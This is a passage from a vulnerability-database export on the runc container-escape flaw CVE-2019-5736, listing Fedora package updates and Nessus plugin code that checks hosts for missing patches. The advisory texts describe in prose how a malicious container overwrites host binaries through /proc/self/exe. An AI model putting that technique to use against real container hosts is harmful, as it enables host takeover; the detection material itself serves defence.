", "modified": "2019-02-19T05:54:38", "published": "2019-02-19T05:54:38", "id": "FEDORA:E1B606076F4E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: moby-engine-18.06.0-2.ce.git0ffa825.fc28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. The python3-lxc package contains the Python3 binding for LXC. ", "modified": "2019-09-06T12:59:40", "published": "2019-09-06T12:59:40", "id": "FEDORA:6381060486F6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: python3-lxc-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-05-03T01:00:03", "published": "2019-05-03T01:00:03", "id": "FEDORA:1D3BD6049C24", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: runc-1.0.0-92.dev.gitc1b8c57.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This me ans they can run anywhere, from your laptop to the largest EC2 compute instance and everything in between - and they don't require you to use a particular language, framework or packaging system. 
That makes them great building blo cks for deploying and scaling web apps, databases, and backend services without depending on a particular stack or provider. ", "modified": "2019-02-19T14:04:24", "published": "2019-02-19T14:04:24", "id": "FEDORA:813AC604EC12", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: moby-engine-18.06.0-2.ce.git0ffa825.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-02-21T01:39:49", "published": "2019-02-21T01:39:49", "id": "FEDORA:3A64160C815D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: runc-1.0.0-68.dev.git6635b4f.fc28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "LXCFS is a simple userspace filesystem designed to work around some current limitations of the Linux kernel. Specifically, it's providing two main things - A set of files which can be bind-mounted over their /proc originals to provide CGroup-aware values. - A cgroupfs-like tree which is container aware. The code is pretty simple, written in C using libfuse. The main driver for this work was the need to run systemd based containers as a regular unprivileged user while still allowing systemd inside the container to interact with cgroups. Now with the introduction of the cgroup namespace in the Linux kernel, that part is no longer necessary on recent kernels and focus is now on making containers feel more like a real independent system through the proc masking feature. 
", "modified": "2019-09-06T12:59:40", "published": "2019-09-06T12:59:40", "id": "FEDORA:37FA36077DE7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: lxcfs-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. ", "modified": "2019-09-06T12:59:39", "published": "2019-09-06T12:59:39", "id": "FEDORA:B42946075886", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: lxc-3.0.4-1.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "LXCFS is a simple userspace filesystem designed to work around some current limitations of the Linux kernel. Specifically, it's providing two main things - A set of files which can be bind-mounted over their /proc originals to provide CGroup-aware values. - A cgroupfs-like tree which is container aware. The code is pretty simple, written in C using libfuse. The main driver for this work was the need to run systemd based containers as a regular unprivileged user while still allowing systemd inside the container to interact with cgroups. Now with the introduction of the cgroup namespace in the Linux kernel, that part is no longer necessary on recent kernels and focus is now on making containers feel more like a real independent system through the proc masking feature. 
", "modified": "2019-09-06T12:35:28", "published": "2019-09-06T12:35:28", "id": "FEDORA:E3C59624D00E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: lxcfs-3.0.4-1.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Linux Resource Containers provide process and resource isolation without the overhead of full virtualization. ", "modified": "2019-09-06T12:35:28", "published": "2019-09-06T12:35:28", "id": "FEDORA:7FBE46071258", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: lxc-3.0.4-1.fc30", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-11T09:22:07", "description": "A vulnerability was discovered in runc, which is used by Docker to run\ncontainers. runc did not prevent container processes from modifying\nthe runc binary via /proc/self/exe. A malicious container could\nreplace the runc binary, resulting in container escape and privilege\nescalation. 
This was fixed by creating a per-container copy of\nrunc.(CVE-2019-5736)", "edition": 19, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-12T00:00:00", "title": "Amazon Linux AMI : docker (ALAS-2019-1156)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:docker", "p-cpe:/a:amazon:linux:docker-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2019-1156.NASL", "href": "https://www.tenable.com/plugins/nessus/122096", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2019-1156.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122096);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"ALAS\", value:\"2019-1156\");\n\n script_name(english:\"Amazon Linux AMI : docker (ALAS-2019-1156)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was discovered in runc, which is used by Docker to run\ncontainers. runc did not prevent container processes from modifying\nthe runc binary via /proc/self/exe. A malicious container could\nreplace the runc binary, resulting in container escape and privilege\nescalation. 
This was fixed by creating a per-container copy of\nrunc.(CVE-2019-5736)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1156.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update docker' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"docker-18.06.1ce-7.25.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"docker-debuginfo-18.06.1ce-7.25.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker / docker-debuginfo\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T14:52:06", "description": "This update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\navoid write attacks to the host runc binary, which could lead to a\ncontainer breakout (bsc#1121967)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-14T00:00:00", "title": "SUSE SLES15 Security Update : docker-runc (SUSE-SU-2019:0362-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:docker-runc", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:docker-runc-debuginfo"], "id": "SUSE_SU-2019-0362-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0362-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122182);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2019-5736\");\n\n script_name(english:\"SUSE SLES15 Security Update : docker-runc (SUSE-SU-2019:0362-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\navoid write attacks to the host runc binary, which could lead to a\ncontainer breakout (bsc#1121967)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5736/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190362-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ec22170\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-362=1\n\nSUSE Linux Enterprise Module for Containers 15:zypper in -t patch\nSUSE-SLE-Module-Containers-15-2019-362=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-1.0.0rc5+gitr3562_69663f0bd4b6-6.9.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-debuginfo-1.0.0rc5+gitr3562_69663f0bd4b6-6.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker-runc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:49", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - It was discovered that a malicious user logged in to a\n Virtuozzo container could potentially overwrite the\n 'vzctl' binary on the host. The attacker could replace\n executables in that container with symlinks to\n '/proc/self/exe'. After that, 'vzctl exec' called from\n the host to run one of such executables would try to\n run the host's 'vzctl' there instead. If the attacker\n managed to intercept that, they would be able to change\n the contents of the host's 'vzctl' binary. 
The issue is\n similar to CVE-2019-5736, but affects 'vzctl' rather\n than 'runc'.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "published": "2020-02-04T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2019-008)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2020-02-04T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2019-008.NASL", "href": "https://www.tenable.com/plugins/nessus/133452", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133452);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2019-008)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - It was discovered that a malicious user logged in to a\n Virtuozzo container could potentially overwrite the\n 'vzctl' binary on the host. The attacker could replace\n executables in that container with symlinks to\n '/proc/self/exe'. After that, 'vzctl exec' called from\n the host to run one of such executables would try to\n run the host's 'vzctl' there instead. 
If the attacker\n managed to intercept that, they would be able to change\n the contents of the host's 'vzctl' binary. The issue is\n similar to CVE-2019-5736, but affects 'vzctl' rather\n than 'runc'.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://virtuozzosupport.force.com/s/article/VZA-2019-008\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78eafaff\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-40.4-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2de194e0\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-43.10-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?644727ce\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-46.7-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fef35233\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-48.2-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ba11462\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-63.3-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c32b3bf8\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-64.7-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9b43be6\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-73.24-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?20f800a1\");\n 
script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.11.6.vz7.40.4\",\n \"patch\",\"readykernel-patch-40.4-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.17.1.vz7.43.10\",\n \"patch\",\"readykernel-patch-43.10-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.46.7\",\n \"patch\",\"readykernel-patch-46.7-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.48.2\",\n \"patch\",\"readykernel-patch-48.2-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.9.1.vz7.63.3\",\n \"patch\",\"readykernel-patch-63.3-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.11.6.vz7.64.7\",\n \"patch\",\"readykernel-patch-64.7-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.20.2.vz7.73.24\",\n \"patch\",\"readykernel-patch-73.24-72.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:32:43", "description": "This runc version should fix the keycreate issues on SELinux disabled\nmachines.\n\n----\n\nLatest upstream\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to 
automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-05-03T00:00:00", "title": "Fedora 29 : 2:runc (2019-6174b47003)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:2:runc"], "id": "FEDORA_2019-6174B47003.NASL", "href": "https://www.tenable.com/plugins/nessus/124570", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-6174b47003.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124570);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:10\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"FEDORA\", value:\"2019-6174b47003\");\n\n script_name(english:\"Fedora 29 : 2:runc (2019-6174b47003)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This runc version should fix the keycreate issues on SELinux disabled\nmachines.\n\n----\n\nLatest upstream\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-6174b47003\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:runc package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
